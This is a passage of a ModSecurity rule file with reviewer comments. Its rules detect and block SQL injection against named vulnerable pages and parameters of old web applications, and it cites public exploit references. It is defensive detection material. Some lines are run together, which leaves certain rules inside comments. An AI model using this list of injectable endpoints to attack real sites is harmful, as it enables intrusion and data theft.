"@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DuWare DuClassmate SQL Injection Attempt -- default.asp iCity UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006717) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS DuWare DuNews SQL Injection Attempt -- detail.asp iNews UPDATE
# Two-link chain evaluated in phase 2. Link 1 carries the id, severity, msg and the
# `block` action, and matches when REQUEST_LINE (after urlDecodeUni, htmlEntityDecode
# and normalisePathWin) contains "/detail.asp".
# NOTE(review): the title says "UPDATE", but neither link tests for the keyword; the
# chain fires on any SQL-injection marker recorded for the iNews parameter. If sibling
# rules exist for other SQL verbs with the same conditions, one request would add
# tx.critical_anomaly_score once per sibling - TODO check the rest of the file.
SecRule REQUEST_LINE "@contains /detail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006717,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS DuWare DuNews SQL Injection Attempt -- detail.asp iNews UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/15681'"
    # `&TX:'/regex/'` counts the TX variables whose name matches; "@gt 0" is true when
    # at least one exists. Presumably those variables are written by the generic SQL
    # injection rules of the rule set, so this rule depends on them being loaded and
    # evaluated first - TODO confirm. On match: audit log part E is added, tx.msg is
    # set and tx.critical_anomaly_score is added to tx.anomaly_score.
    SecRule &TX:'/SQL_INJECTION.*ARGS:iNews/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS DuWare DuNews SQL Injection Attempt -- detail.asp iNews UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2003775) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS E-Annu SQL Injection Attempt -- home.php a UPDATE
# Two-link chain: "/home.php" substring in REQUEST_LINE, then a TX marker whose name
# matches /SQL_INJECTION.*ARGS:a/.
# NOTE(review): "/home.php" is a common file name and REQUEST_LINE includes the query
# string, so link 1 does not by itself identify this product.
SecRule REQUEST_LINE "@contains /home.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003775,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS E-Annu SQL Injection Attempt -- home.php a UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/23727'"
    # NOTE(review): the name regex is not anchored at the end, so "ARGS:a" matches the
    # marker of every parameter whose name begins with "a" (for example the constructed
    # names "action" or "id_a" would and would not match respectively). With a
    # one-letter parameter this makes the rule attribute unrelated SQL-injection hits
    # on home.php to E-Annu. Appending "$" to the regex would restrict it to the
    # parameter "a" itself - verify how array-style names are recorded before changing.
    SecRule &TX:'/SQL_INJECTION.*ARGS:a/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS E-Annu SQL Injection Attempt -- home.php a UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004629) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS EQdkp SQL Injection Attempt -- listmembers.php rank UPDATE
SecRule REQUEST_LINE "@contains 
/listmembers.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004629,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS EQdkp SQL Injection Attempt -- listmembers.php rank UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4030'" SecRule &TX:'/SQL_INJECTION.*ARGS:rank/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS EQdkp SQL Injection Attempt -- listmembers.php rank UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005273) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Easebay Resources Paypal Subscription Manager SQL Injection Attempt -- memberlist.php keyword UPDATE SecRule REQUEST_LINE "@contains /admin/memberlist.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005273,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Easebay Resources Paypal Subscription Manager SQL Injection Attempt -- memberlist.php keyword UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/457506/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:keyword/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Easebay Resources Paypal Subscription Manager SQL Injection Attempt -- memberlist.php keyword UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005279) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Easebay Resources Login Manager SQL Injection Attempt -- memberlist.php init_row UPDATE SecRule REQUEST_LINE "@contains /admin/memberlist.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005279,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Easebay Resources Login Manager SQL 
Injection Attempt -- memberlist.php init_row UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/457505/100/0/threaded'" SecRule &TX:'/SQL_INJECTION.*ARGS:init_row/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Easebay Resources Login Manager SQL Injection Attempt -- memberlist.php init_row UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
#
# How each SLR rule pair below works (two-link chain, phase 2):
#   Link 1 matches when REQUEST_LINE, after urlDecodeUni, htmlEntityDecode and
#   normalisePathWin, contains the script path. It carries the id, msg, tags
#   and the "block" action, so the disruptive outcome is whatever the
#   enclosing SecDefaultAction defines.
#   Link 2 counts (&) the TX variables whose name matches the regex and needs
#   at least one. When both links match, audit-log part E is added,
#   tx.anomaly_score is raised by tx.critical_anomaly_score, and the match is
#   recorded under a rule-id-prefixed WEB_ATTACK/SQL_INJECTION key.
# NOTE(review): link 2 only inspects TX variables that already exist, so these
#   rules presumably depend on generic SQL injection rules having run earlier
#   in phase 2 and stored their matches under such keys -- confirm the include
#   order; otherwise the chains cannot fire.
# NOTE(review): the transformation list has no t:lowercase, so the path literal
#   is compared exactly as written -- confirm that matches how the protected
#   server resolves script names.
#
# (2005045) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS EasyMoblog SQL Injection Attempt -- add_comment.php i UPDATE
# NOTE(review): the name regex stops at "ARGS:i" with no end anchor, so it also
#   matches TX keys recorded for any parameter whose name merely begins with
#   "i". The alert text names parameter "i", which can mislead triage when a
#   different parameter was the one flagged. Anchoring the end of the name
#   would narrow it; run the regression tests before changing the pattern.
SecRule REQUEST_LINE "@contains /add_comment.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005045,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS EasyMoblog SQL Injection Attempt -- add_comment.php i UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22369'"
SecRule &TX:'/SQL_INJECTION.*ARGS:i/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS EasyMoblog SQL Injection Attempt -- add_comment.php i UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2005050) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS EasyMoblog SQL Injection Attempt -- add_comment.php post_id UPDATE
# Same script path as 2005045; only the parameter name in link 2 differs.
SecRule REQUEST_LINE "@contains /add_comment.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005050,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS EasyMoblog SQL Injection Attempt -- add_comment.php post_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22369'"
SecRule &TX:'/SQL_INJECTION.*ARGS:post_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS EasyMoblog SQL Injection Attempt -- add_comment.php post_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2005056) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS EasyMoblog SQL Injection Attempt -- list_comments.php i UPDATE
# NOTE(review): same unanchored "ARGS:i" name pattern as 2005045, with the
#   same over-match on parameters whose names begin with "i".
SecRule REQUEST_LINE "@contains /list_comments.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005056,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS EasyMoblog SQL Injection Attempt -- list_comments.php i UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22369'"
SecRule &TX:'/SQL_INJECTION.*ARGS:i/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS EasyMoblog SQL Injection Attempt -- list_comments.php i UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2006559) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS EasyPage SQL Injection Attempt -- default.aspx docId UPDATE
# The path literal includes the /sptrees/ directory, so link 1 is scoped to
# that location rather than to every default.aspx.
SecRule REQUEST_LINE "@contains /sptrees/default.aspx" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006559,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS EasyPage SQL Injection Attempt -- default.aspx docId UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/453586/100/100/threaded'"
SecRule &TX:'/SQL_INJECTION.*ARGS:docId/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS EasyPage SQL Injection Attempt -- default.aspx docId UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2005092) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Eclectic Designs CascadianFAQ SQL Injection Attempt -- index.php qid UPDATE SecRule REQUEST_LINE "@contains /index.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005092,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Eclectic Designs CascadianFAQ SQL Injection Attempt -- index.php qid UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0424'" SecRule &TX:'/SQL_INJECTION.*ARGS:qid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Eclectic Designs CascadianFAQ SQL Injection Attempt -- index.php qid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005116) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Eclectic Designs CascadianFAQ SQL Injection Attempt -- index.php catid UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005116,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Eclectic Designs CascadianFAQ SQL Injection Attempt -- index.php catid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3227'" SecRule &TX:'/SQL_INJECTION.*ARGS:catid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Eclectic Designs CascadianFAQ SQL Injection Attempt -- index.php catid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005990) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Efkan Forum SQL Injection Attempt -- admin.asp grup UPDATE SecRule REQUEST_LINE "@contains /admin.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005990,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Efkan Forum SQL Injection Attempt -- admin.asp grup UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/5150'" SecRule 
&TX:'/SQL_INJECTION.*ARGS:grup/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Efkan Forum SQL Injection Attempt -- admin.asp grup UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005996) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Efkan Forum SQL Injection Attempt -- default.asp id UPDATE SecRule REQUEST_LINE "@contains /default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005996,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Efkan Forum SQL Injection Attempt -- default.asp id UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/5150'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Efkan Forum SQL Injection Attempt -- default.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006002) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Efkan Forum SQL Injection Attempt -- admin.asp id UPDATE SecRule REQUEST_LINE "@contains /admin.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006002,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Efkan Forum SQL Injection Attempt -- admin.asp id UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2006/5150'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Efkan Forum SQL Injection Attempt -- admin.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006164) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Efkan Forum SQL Injection Attempt -- default.asp 
grup UPDATE SecRule REQUEST_LINE "@contains /default.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006164,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Efkan Forum SQL Injection Attempt -- default.asp grup UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21726'" SecRule &TX:'/SQL_INJECTION.*ARGS:grup/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Efkan Forum SQL Injection Attempt -- default.asp grup UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2006454) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Elxis CMS SQL Injection Attempt -- mod_banners.php UPDATE
# Two-link chain in phase 2. Link 1 matches when the decoded, path-normalised
# REQUEST_LINE contains /mod_banners.php. Link 2 differs from the neighbouring
# SLR rules: instead of counting TX variables for a named parameter, it runs a
# case-insensitive regex directly over QUERY_STRING and REQUEST_BODY, so it
# does not depend on an earlier rule having flagged the request. On a full
# match it adds audit-log part E, raises tx.anomaly_score by
# tx.critical_anomaly_score and records the matched variable under a
# rule-id-prefixed WEB_ATTACK/SQL_INJECTION key.
# NOTE(review): "UPDATE.+SET" has no word boundaries, so ordinary text in the
#   query string or body that contains "update" followed later by "set" (inside
#   longer words as well) satisfies it. Consider \b anchors if this produces
#   false positives, and run the regression tests before changing the pattern.
# NOTE(review): link 2 lists no t: actions, so the transformations applied to
#   it are presumably whatever SecDefaultAction supplies -- confirm that this
#   matches the decoding intended for link 1.
SecRule REQUEST_LINE "@contains /mod_banners.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006454,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Elxis CMS SQL Injection Attempt -- mod_banners.php UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/24478'"
SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Elxis CMS SQL Injection Attempt -- mod_banners.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"
# (2006140) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eMates SQL Injection Attempt -- newsdetail.asp ID UPDATE SecRule REQUEST_LINE "@contains /newsdetail.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006140,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eMates SQL Injection Attempt -- newsdetail.asp ID UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2990'" SecRule &TX:'/SQL_INJECTION.*ARGS:ID/' "@gt 
0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eMates SQL Injection Attempt -- newsdetail.asp ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006152) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eCars SQL Injection Attempt -- Types.asp Type_id UPDATE SecRule REQUEST_LINE "@contains /Types.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006152,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eCars SQL Injection Attempt -- Types.asp Type_id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2989'" SecRule &TX:'/SQL_INJECTION.*ARGS:Type_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eCars SQL Injection Attempt -- Types.asp Type_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006158) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb ePages SQL Injection Attempt -- actualpic.asp Biz_ID UPDATE SecRule REQUEST_LINE "@contains /actualpic.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006158,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb ePages SQL Injection Attempt -- actualpic.asp Biz_ID UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/2991'" SecRule &TX:'/SQL_INJECTION.*ARGS:Biz_ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb ePages SQL Injection Attempt -- actualpic.asp Biz_ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007047) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds 
SQL Injection Attempt -- ad.asp AD_ID UPDATE SecRule REQUEST_LINE "@contains /ad.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007047,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- ad.asp AD_ID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21192'" SecRule &TX:'/SQL_INJECTION.*ARGS:AD_ID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- ad.asp AD_ID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007053) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- ad.asp cat_id UPDATE SecRule REQUEST_LINE "@contains /ad.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007053,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- ad.asp cat_id UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21192'" SecRule &TX:'/SQL_INJECTION.*ARGS:cat_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- ad.asp cat_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007049) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- ad.asp sub_id UPDATE SecRule REQUEST_LINE "@contains /ad.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007049,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- ad.asp sub_id 
UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21192'" SecRule &TX:'/SQL_INJECTION.*ARGS:sub_id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- ad.asp sub_id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007035) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- dircat.asp cid UPDATE SecRule REQUEST_LINE "@contains /dircat.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007035,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- dircat.asp cid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21192'" SecRule &TX:'/SQL_INJECTION.*ARGS:cid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- dircat.asp cid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007041) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- dirSub.asp sid UPDATE SecRule REQUEST_LINE "@contains /dirSub.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007041,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- dirSub.asp sid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21192'" SecRule &TX:'/SQL_INJECTION.*ARGS:sid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eClassifieds SQL Injection Attempt -- dirSub.asp sid 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007081) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- dircat.asp cid UPDATE SecRule REQUEST_LINE "@contains /dircat.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007081,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- dircat.asp cid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21193'" SecRule &TX:'/SQL_INJECTION.*ARGS:cid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- dircat.asp cid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007087) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- dirSub.asp sid UPDATE SecRule REQUEST_LINE "@contains /dirSub.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2007087,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- dirSub.asp sid UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21193'" SecRule &TX:'/SQL_INJECTION.*ARGS:sid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- dirSub.asp sid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2007093) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Enthrallweb eHomes SQL Injection Attempt -- types.asp TYPE_ID UPDATE SecRule REQUEST_LINE "@contains /types.asp" 
